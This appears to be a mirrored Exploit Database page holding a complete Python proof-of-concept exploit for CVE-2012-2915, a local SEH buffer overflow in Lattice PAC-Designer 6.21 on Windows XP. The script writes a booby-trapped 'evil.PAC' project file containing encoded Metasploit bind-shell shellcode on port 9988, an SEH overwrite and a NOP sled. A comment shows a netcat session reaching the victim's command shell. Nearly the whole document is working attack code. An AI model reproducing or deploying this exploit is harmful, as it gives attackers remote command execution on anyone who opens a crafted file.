Lattice Semiconductor PAC-Designer 6.21 – ‘.PAC’ Local Overflow

• Exploit Database
• 35 阅读

• 作者： b33f
  日期： 2012-06-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19006/

• #!/usr/bin/python -w
  
  #------------------------------------------------------------------------------------#
  # Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #
  # CVE: CVE-2012-2915 #
  # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/#
  # OS: WinXP SP1#
  # Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
  #------------------------------------------------------------------------------------#
  # I didn't dig to deep but it seems portability to other OS builds is not promising#
  # due to SafeSEH and badchars in the application modules.#
  #------------------------------------------------------------------------------------#
  # root@bt:~# nc -nv 192.168.111.130 9988 #
  #(UNKNOWN) [192.168.111.130] 9988 (?) open #
  #Microsoft Windows XP [Version 5.1.2600] #
  #(C) Copyright 1985-2001 Microsoft Corp. #
  ##
  #C:\Documents and Settings\Owner\Desktop>#
  #------------------------------------------------------------------------------------#
  
  filename="evil.PAC"
  
  PAC1 = """<?xml version="1.0"?>
  
  <PacDesignData>
  
  <DocFmtVersion>1</DocFmtVersion>
  <DeviceType>ispPAC-CLK5410D</DeviceType>
  
  <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
  
  <SummaryInformation>
  <Title>Oops..</Title>
  <Author>b33f</Author>
  </SummaryInformation>
  
  <SymbolicSchematicData>
  <Symbol>
  <SymKey>153</SymKey>
  <NameText>Profile 0 Ref Frequency</NameText>
  <Value>"""
  
  #------------------------------------------------------------------------------------#
  # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c#
  # [*] x86/alpha_mixed succeeded with size 744 (iteration=1)#
  #------------------------------------------------------------------------------------#
  shellcode = (
  "\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
  "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
  "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
  "\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
  "\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
  "\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
  "\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
  "\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
  "\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
  "\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
  "\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
  "\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
  "\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
  "\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
  "\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
  "\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
  "\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
  "\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
  "\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
  "\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
  "\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
  "\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
  "\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
  "\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
  "\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
  "\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
  "\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
  "\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
  "\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
  "\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
  "\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
  "\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
  "\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
  "\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
  "\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
  "\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
  "\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
  "\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
  "\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
  "\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
  "\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
  "\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
  "\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
  "\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
  "\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
  "\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
  "\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
  "\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
  "\x70\x30\x53\x79\x6f\x68\x55\x41\x41")
  
  #------------------------------------------------------------------------------------#
  # SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll#
  # nSEH: \xEB\x05 #
  #------------------------------------------------------------------------------------#
  b00m = "\x90"*20 + shellcode
  payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))
  
  PAC2 = """</Value>
  </Symbol>
  </SymbolicSchematicData>
  
  </PacDesignData>"""
  
  buffer = PAC1 + payload + PAC2
  
  textfile = open(filename , 'w')
  textfile.write(buffer)
  textfile.close()